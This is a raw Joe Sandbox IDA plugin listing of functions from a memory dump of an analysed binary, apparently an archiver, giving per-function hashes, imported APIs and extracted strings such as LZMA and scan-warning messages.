Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
Instruction ID: 5037de4d4916d29dc1aa2cdb09f26b1774f0bc1d9e3c830cde029523ca9f0d48
Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
Instruction Fuzzy Hash: D8519E72F006099BDF08CF99D9816AEB7F6EB88704F248569D119E7381EB749F41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A2A9C0 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd79d8287aa755d39c71c45e81140302666bd6671d2b927d11a86a4aa5470ce
Instruction ID: 876cdf999abb7977b5dceadafc04bfcff03f5cfc87e0d6139d2639bf80e3a2fd
Opcode Fuzzy Hash: afd79d8287aa755d39c71c45e81140302666bd6671d2b927d11a86a4aa5470ce
Instruction Fuzzy Hash: 3541C332F10A204AF348CE769C811666BD3DBC9393B45C23DE595CB6D9DABDC41782A0

Uniqueness

Uniqueness Score: -1.00%

Function 009EA87C Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
Instruction ID: bffca97d502b3b0885fabe70be5dbef81c784a7cfc89d24101aff0c25275edbd
Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
Instruction Fuzzy Hash: 573114677A4441138B1DCD2BCC027AF92575BE422674EDF395844CAF65D92CD8124146

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C350 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
Instruction ID: 8abad2b8d6a1f8a575302f48aba29c1233ebb0bc04deca79ab72be6b40c1c885
Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
Instruction Fuzzy Hash: F5312873500A350AF620AA2EAD5C37FB213DFD1774F2AC739D956876ECDA719C068140

Uniqueness

Uniqueness Score: -1.00%

Function 00A2C4B0 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e60619b53f5733759f851c7e89353584e6ca2cea002716f3001e8b4c6fadb46
Instruction ID: 677b33405f0ac6da8f626b0d9b487f5a6309d99c2cd941c915fcb8d7de85fd67
Opcode Fuzzy Hash: 9e60619b53f5733759f851c7e89353584e6ca2cea002716f3001e8b4c6fadb46
Instruction Fuzzy Hash: 9D3155B3980A360BF220861EED8437E6253EFD2370F1A8338D856976E8CA71FD468140

Uniqueness

Uniqueness Score: -1.00%

Function 009D15BB Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b82652f240c170a2ddcf6d914e273aff744bebad427bdcd186f7dec12f66509f
Instruction ID: 090383574a32b31a748d433c9f2561a05c6ca40140071214c997ff194c9fc39c
Opcode Fuzzy Hash: b82652f240c170a2ddcf6d914e273aff744bebad427bdcd186f7dec12f66509f
Instruction Fuzzy Hash: DD218137AA091A4BD70CCA68DC73AB93291F745306F49567DEA4BCB3D0DE6C8941C248

Uniqueness

Uniqueness Score: -1.00%

Function 00A3D260 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50e5608d0763719f9a8653ff6b5933f4efc217e12f0444a816b0515fbed13d69
Instruction ID: 46d4507abcd2412c3f90d745098d290c2900d5054c7aab648ae70ba96e8f6f3d
Opcode Fuzzy Hash: 50e5608d0763719f9a8653ff6b5933f4efc217e12f0444a816b0515fbed13d69
Instruction Fuzzy Hash: 93213AB5A043E78BF3109E69DCC427577D2ABC1301F0C457AE994CFA8AD2798982D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4253A Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
Instruction ID: 776ddc2efff3ce94de3e2299fdd8d0fb6d14814de5a9106ce71ae410383ab8e7
Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
Instruction Fuzzy Hash: AF21497251042547C705DF2DE898777B3E1FFD4319FA78A3AE9828B180C638D845D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A42621 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d22ac803694251da3d5663bdc7c2053185f9a951a5658cb00391f05c9a66c7
Instruction ID: 4da0d072af47890144ca47e5ee86dc69735ee67f0512b876f8a17e63cf3e5ba2
Opcode Fuzzy Hash: 86d22ac803694251da3d5663bdc7c2053185f9a951a5658cb00391f05c9a66c7
Instruction Fuzzy Hash: 4921F4326011148BC741EF6AD88479BB3E6FFC8365FA7C63DED8147245C631EA0687A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A41320 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
Instruction ID: a2f39dc9d60444cf1bf0ad4669f6ceb1fe0a148de4ed1b79668c17395937bc76
Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
Instruction Fuzzy Hash: 25218E77320A0647E74C8A38D93737522D0A745318F98A22DEA6BCE2C2D73AC457C384

Uniqueness

Uniqueness Score: -1.00%

Function 00A381E0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 796fa06eff2f49fc444fcc1adb98cbeaf3cf90a2c747341278c1d966553bae6f
Instruction ID: ef13628df5ac6968cac40ec32c314fe11a2c4234511b546130856d7e2a50112f
Opcode Fuzzy Hash: 796fa06eff2f49fc444fcc1adb98cbeaf3cf90a2c747341278c1d966553bae6f
Instruction Fuzzy Hash: 6701E16529668989D781DA7DD890749FE80F756302F9CC3E4F0C8CBF42D989C54BC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A330A0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
Instruction ID: 60c23c63625bbb260ae148e7f73e79e4ed0b24037149084a318f5e03950b779f
Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
Instruction Fuzzy Hash: FC018C72914A2E57DB289F48CC45136B390FB85312F49823AEE879B385E734F970C6D4

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F920 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
Instruction ID: 386e9e814b354cf1faf7e589c9e15932ade415245ffdd2ec994b8d1523ed7ba4
Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
Instruction Fuzzy Hash: 3AC08CA31281002BC316EA2999D0BAAE7A37360330F268C3FB092E3F43C228C0658111

Uniqueness

Uniqueness Score: -1.00%

Function 00A1B989 Relevance: 28.5, APIs: 13, Strings: 3, Instructions: 452COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1B98E

Part of subcall function 00A1B088: _CxxThrowException.MSVCRT(?,00A58128), ref: 00A1B0AB

memcpy.MSVCRT ref: 00A1BD80
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BE1C
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BE30
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BE44
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BE58
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BE6C
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BE80
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BE94
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BEA8
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BEBC
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BED0
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1BEE4

Part of subcall function 00A1AEB1: _CxxThrowException.MSVCRT(?,00A580E8), ref: 00A1AEC4

Strings

, xrefs: 00A1BB6C
@, xrefs: 00A1BB62
!, xrefs: 00A1BB8E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionThrow$H_prologmemcpy
String ID: $!$@
API String ID: 3273695820-2517134481
Opcode ID: 04a28dfd93032269380a814bbc7d51a31a8fae122f63fb84d25316a3936cd053
Instruction ID: 028eab832304e7e658405487a4110bcbcc3940ba09ed3bf4ba1d762b23eda8c3
Opcode Fuzzy Hash: 04a28dfd93032269380a814bbc7d51a31a8fae122f63fb84d25316a3936cd053
Instruction Fuzzy Hash: 7D128C74E15249EFCF14DFA5C9819EEBBB1FF09300F148469E946AB752CB30A985CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A4DF Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 179COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0A4E4
fputs.MSVCRT ref: 00A0A54E

Part of subcall function 009D2221: fputs.MSVCRT ref: 009D223B

fputs.MSVCRT ref: 00A0A51F

Part of subcall function 00A0A711: __EH_prolog.LIBCMT ref: 00A0A716
Part of subcall function 00A0A711: fputs.MSVCRT ref: 00A0A73F
Part of subcall function 00A0A711: fputs.MSVCRT ref: 00A0A783

fputs.MSVCRT ref: 00A0A5D1
fputs.MSVCRT ref: 00A0A5F0
fputs.MSVCRT ref: 00A0A619
fputs.MSVCRT ref: 00A0A62C
fputc.MSVCRT ref: 00A0A639

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Strings

Scan WARNINGS: , xrefs: 00A0A549
Error:, xrefs: 00A0A6E3
Scan WARNINGS for files and folders:, xrefs: 00A0A51A
WARNING: Cannot open , xrefs: 00A0A614
WARNINGS for files:, xrefs: 00A0A5EB
file, xrefs: 00A0A627

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prologfputc
String ID: Error:$ file$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
API String ID: 3294964263-2840245699
Opcode ID: ece0b580b1e0509e5f8037c1a1ef938cd2932adda9f351183463d28e36e5e2b8
Instruction ID: ca6cf478bd11b8237674c78c77f63b3144af3df366db3b2bc4b71ca526ae5fb9
Opcode Fuzzy Hash: ece0b580b1e0509e5f8037c1a1ef938cd2932adda9f351183463d28e36e5e2b8
Instruction Fuzzy Hash: 5F518236A442099BCF19EF94E882AADB7B1FF94301F24816FF405662D1DF725E44CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009DBCDF Relevance: 21.5, APIs: 17, Instructions: 290COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 009DBCF8
memcmp.MSVCRT ref: 009DBD15
memcmp.MSVCRT ref: 009DBD28

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 51ec70b7abc230e2d83e8d2df2be1e1ef17aa27b9057fd3ea763ad8d115ec861
Instruction ID: e45d0708e573cbb159c57129370d8f4ef7aec520048b90f732d433ad9f2eea14
Opcode Fuzzy Hash: 51ec70b7abc230e2d83e8d2df2be1e1ef17aa27b9057fd3ea763ad8d115ec861
Instruction Fuzzy Hash: EB9152B1A40611EBD7209E25CD41FAB77ACAFA5740F058829FD5ADB341EB60FE04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009E1D61 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 165COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E1D66
OpenFileMappingW.KERNEL32(00000004,00000000,00000002,?,?,?,00000000,?), ref: 009E1E2A
GetLastError.KERNEL32(?,?,00000000,?), ref: 009E1E37

Strings

Map data error, xrefs: 009E1F26
MapViewOfFile error, xrefs: 009E1E79
Unsupported Map data size, xrefs: 009E1F4A
Cannot open mapping, xrefs: 009E1E4D
Unsupported Map data, xrefs: 009E1EB7

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorFileH_prologLastMappingOpen
String ID: Cannot open mapping$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
API String ID: 2221086200-2628113885
Opcode ID: 317b2448b712121ad04b0be83e952e7a62a5fcdb938c081d6a340edddce424e2
Instruction ID: c53bc90063300ec6371ef5dd769a210a4a8a7f2fa1ab4e44535141f56b80a632
Opcode Fuzzy Hash: 317b2448b712121ad04b0be83e952e7a62a5fcdb938c081d6a340edddce424e2
Instruction Fuzzy Hash: C051AC75C0029AEFCB02EBA5C885AEEBBB5EF99304F104459E805B3251CB715E85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A04860 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A04865
fputs.MSVCRT ref: 00A04882
fputs.MSVCRT ref: 00A0488B

Part of subcall function 009D2163: __EH_prolog.LIBCMT ref: 009D2168

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

fputs.MSVCRT ref: 00A048D1
fputs.MSVCRT ref: 00A048DA
fputs.MSVCRT ref: 00A048E1

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

fputs.MSVCRT ref: 00A04913
fputs.MSVCRT ref: 00A0491C
fputs.MSVCRT ref: 00A04924

Strings

Modified: , xrefs: 00A04917
Path: , xrefs: 00A04886
Size: , xrefs: 00A048D5

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prolog$fputcfree
String ID: Modified: $Path: $Size:
API String ID: 2632947726-3207571042
Opcode ID: bb4443368ec17fb6fecf1003a4f8df03ba23a147eebbba7153d02031990ead01
Instruction ID: d00bcb03423de000a985f104a9eb1f01373e1178dc4760fca1b7a7ab057c7272
Opcode Fuzzy Hash: bb4443368ec17fb6fecf1003a4f8df03ba23a147eebbba7153d02031990ead01
Instruction Fuzzy Hash: 28217175A40109ABCF05ABD5DC82EAEBF36FFC4350F048016F904562A1EB719865EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A0657F Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A06584
fputs.MSVCRT ref: 00A065E3
fputs.MSVCRT ref: 00A06612
fputs.MSVCRT ref: 00A066A7
fputs.MSVCRT ref: 00A0671C
fputs.MSVCRT ref: 00A068B2

Strings

data:, xrefs: 00A06717
@, xrefs: 00A0670B

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prolog
String ID: @$data:
API String ID: 2614055831-1130426132
Opcode ID: 312d12e295c348e5c08dda198b3e05d125a73734cdb2539ae695aae33dc93b8d
Instruction ID: c23976cecc631f95d2f1aa22360fb4408b8ba40ca5e31b7938a3453d645175f9
Opcode Fuzzy Hash: 312d12e295c348e5c08dda198b3e05d125a73734cdb2539ae695aae33dc93b8d
Instruction Fuzzy Hash: 04D1B371A0020DAFCF14DFA4E984AEEB7B5FF58318F248519E546A3291E730AD68CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A18834 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 347COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A18839

Strings

LZMA, xrefs: 00A1896C
, xrefs: 00A18926
o, xrefs: 00A18A8A
., xrefs: 00A18C5A
LZMA2, xrefs: 00A18A59
, xrefs: 00A18B86
:mem, xrefs: 00A18A94, 00A18A9E
Delta, xrefs: 00A18AC8

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: $ $.$:mem$Delta$LZMA$LZMA2$o
API String ID: 3519838083-3806607069
Opcode ID: ef095db4788317f5393589c6c991a434b00f7f43bdbcb0d62de95a58ed2474c0
Instruction ID: c2e1a378e592de09ccce6e8544c5aadf8f6863808a9a1983b1060ca738d0aab7
Opcode Fuzzy Hash: ef095db4788317f5393589c6c991a434b00f7f43bdbcb0d62de95a58ed2474c0
Instruction Fuzzy Hash: 05D11731D082698FCF21CFA8C8947FEBBB2BF55304F24416AD4566B241CB795D85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D622C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116threadCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D6231
GetCurrentThreadId.KERNEL32 ref: 009D6241
GetTickCount.KERNEL32 ref: 009D624C
GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 009D6257
GetTickCount.KERNEL32 ref: 009D62B1
SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 009D62FE
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 009D6325

Part of subcall function 009D5A99: __EH_prolog.LIBCMT ref: 009D5A9E
